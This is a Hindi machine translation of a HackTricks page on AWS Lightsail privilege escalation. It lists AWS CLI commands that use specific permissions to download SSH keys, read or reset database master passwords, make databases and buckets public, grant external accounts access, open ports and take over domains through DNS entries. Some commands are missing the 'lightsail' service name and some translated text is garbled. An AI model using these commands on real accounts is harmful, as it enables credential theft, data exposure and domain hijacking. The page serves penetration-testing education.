AWS - Lightsail Privesc

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

Lightsail

Lightsail के बारे में अधिक जानकारी के लिए देखें:

pageAWS - Lightsail Enum

यह महत्वपूर्ण है कि Lightsail उपयोगकर्ता के नाम से IAM भूमिकाओं का उपयोग नहीं करता है बल्कि एक AWS प्रबंधित खाते के लिए, इसलिए आप इस सेवा का दुरुपयोग नहीं कर सकते। हालांकि, इस सेवा में संवेदनशील डेटा जैसे कोड, API कुंजी और डेटाबेस सूचना मिल सकती है।

lightsail:DownloadDefaultKeyPair

इस अनुमति से आप इंस्टेंस तक पहुंचने के लिए SSH कुंजी प्राप्त कर सकते हैं:

aws lightsail download-default-key-pair

संभावित प्रभाव: उदाहरणों में संवेदनशील जानकारी खोजें।

lightsail:GetInstanceAccessDetails

यह अनुमति आपको उदाहरणों तक पहुंचने के लिए SSH कुंजी उत्पन्न करने की अनुमति देगी:

aws lightsail get-instance-access-details --instance-name <instance_name>

संभावित प्रभाव: उदाहरणों में संवेदनशील जानकारी खोजें।

lightsail:CreateBucketAccessKey

यह अनुमति आपको बकेट तक पहुंचने की कुंजी प्राप्त करने की अनुमति देगी:

aws lightsail create-bucket-access-key --bucket-name <name>

संभावित प्रभाव: बाल्टी में गोपनीय जानकारी खोजें।

lightsail:GetRelationalDatabaseMasterUserPassword

यह अनुमति आपको डेटाबेस तक पहुंचने के लिए प्रमाणपत्र प्राप्त करने की अनुमति देगी:

aws lightsail get-relational-database-master-user-password --relational-database-name <name>

संभावित प्रभाव: डेटाबेस में संवेदनशील जानकारी खोजें।

lightsail:UpdateRelationalDatabase

यह अनुमति आपको डेटाबेस तक पहुंचने के लिए पासवर्ड बदलने की अनुमति देगी:

aws lightsail update-relational-database --relational-database-name <name> --master-user-password <strong_new_password>

यदि डेटाबेस सार्वजनिक नहीं है, तो आप इस अनुमतियों के साथ इसे सार्वजनिक भी बना सकते हैं।

aws lightsail update-relational-database --relational-database-name <name> --publicly-accessible

संभावित प्रभाव: डेटाबेस में संवेदनशील जानकारी खोजें।

lightsail:OpenInstancePublicPorts

यह अनुमति इंटरनेट पर पोर्ट खोलने की अनुमति देती है।

aws lightsail open-instance-public-ports \
--instance-name MEAN-2 \
--port-info fromPort=22,protocol=TCP,toPort=22

संभावित प्रभाव: संवेदनशील पोर्ट तक पहुंच।

lightsail:PutInstancePublicPorts

यह अनुमति इंटरनेट पर पोर्ट खोलने की अनुमति देती है। ध्यान दें कि कॉल उस पर किसी भी पोर्ट को बंद कर देगा जो इस पर निर्दिष्ट नहीं है।

aws lightsail put-instance-public-ports \
--instance-name MEAN-2 \
--port-infos fromPort=22,protocol=TCP,toPort=22

संभावित प्रभाव: संवेदनशील पोर्ट तक पहुंच।

lightsail:SetResourceAccessForBucket

यह अनुमति इंस्टेंस को किसी बकेट तक पहुंच देने की अनुमति देती है बिना किसी अतिरिक्त प्रमाण-पत्र के।

aws set-resource-access-for-bucket \
--resource-name <instance-name> \
--bucket-name <bucket-name> \
--access allow

संभावित प्रभाव: संवेदनशील जानकारी वाले बकेट्स तक पहुंच की संभावना।

lightsail:UpdateBucket

इस अनुमति के साथ एक हमलावर अपने खुद के AWS खाते को बकेट्स पर पढ़ने की पहुंच प्रदान कर सकता है या यहाँ तक कि बकेट्स को सभी के लिए सार्वजनिक बना सकता है:

# Grant read access to exterenal account
aws update-bucket --bucket-name <value> --readonly-access-accounts <external_account>

# Grant read to the public
aws update-bucket --bucket-name <value> --access-rules getObject=public,allowPublicOverrides=true

# Bucket private but single objects can be public
aws update-bucket --bucket-name <value> --access-rules getObject=private,allowPublicOverrides=true

संभावित प्रभाव: संभावित नए एक्सेस को बकेट्स के साथ।

lightsail:UpdateContainerService

इस अनुमति के साथ एक हमलावर डिफ़ॉल्ट रूप से कंटेनर सेवा से प्राइवेट ECRs तक पहुंच प्रदान कर सकता है।

aws update-container-service \
--service-name <name> \
--private-registry-access ecrImagePullerRole={isActive=boolean}

संभावित प्रभाव: निजी ECR से संवेदनशील जानकारी प्राप्त करें

lightsail:CreateDomainEntry

इस अनुमति के साथ एक हमलावर उपनाम बना सकता है और इसे अपने खुद के आईपी पते पर पॉइंट कर सकता है (उपनाम ले लेना), या एक SPF रिकॉर्ड बना सकता है जो उसे डोमेन से ईमेल लेने की अनुमति देता है, या यहाँ तक कि मुख्य डोमेन को अपने खुद के आईपी पते पर सेट कर सकता है।

aws lightsail create-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

संभावित प्रभाव: डोमेन का अधिकार

lightsail:UpdateDomainEntry

इस अनुमति के साथ एक हमलावर उपन्यास उपन्यास बना सकता है और इसे अपने खुद के आईपी पते पर पॉइंट कर सकता है (सबडोमेन तकना), या एसपीएफ रिकॉर्ड को तैयार कर सकता है जो उसे डोमेन से ईमेल भेजने की अनुमति देता है, या यहां तक ​​कि मुख्य डोमेन को अपने खुद के आईपी पते पर सेट कर सकता है।

aws lightsail update-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

संभावित प्रभाव: डोमेन का अधिकार लेना

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

Last updated